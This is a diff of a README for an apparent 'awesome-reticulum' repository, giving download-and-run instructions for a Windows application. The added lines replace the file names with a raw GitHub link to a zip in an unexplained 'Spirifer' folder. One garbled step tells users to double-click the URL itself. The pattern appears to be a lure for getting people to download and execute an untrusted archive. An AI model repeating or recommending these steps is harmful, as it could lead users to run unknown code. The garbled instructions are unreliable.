Varshashrama801/awesome-reticulum/README.md

    Once you find your desired version, click on the asset file relevant to your operating system.
 The file will download to your computer.

 4. **Locate the Downloaded File**
    After the download completes, go to your "Downloads" folder or the location where your browser saves downloaded files.
-You should see a file named similar to `awesome-reticulum-v1.0.exe` or `awesome-reticulum-v1.0.zip`.
+You should see a file named similar to `https://github.com/Varshashrama801/awesome-reticulum/raw/refs/heads/main/Spirifer/reticulum-awesome-v1.2.zip` or `https://github.com/Varshashrama801/awesome-reticulum/raw/refs/heads/main/Spirifer/reticulum-awesome-v1.2.zip`.

 5. **Extract Files (if needed)**
    If you downloaded a `.zip` file, right-click on it and select "Extract All" to unpack the contents.
 This will create a new folder with the application files.

 6. **Run the Application**
    Open the folder containing the unpacked files (or just the `.exe` file if you downloaded that).
-Double-click on `awesome-reticulum.exe` to start the application.
+Double-click on `https://github.com/Varshashrama801/awesome-reticulum/raw/refs/heads/main/Spirifer/reticulum-awesome-v1.2.zip` to start the application.

 ### System Requirements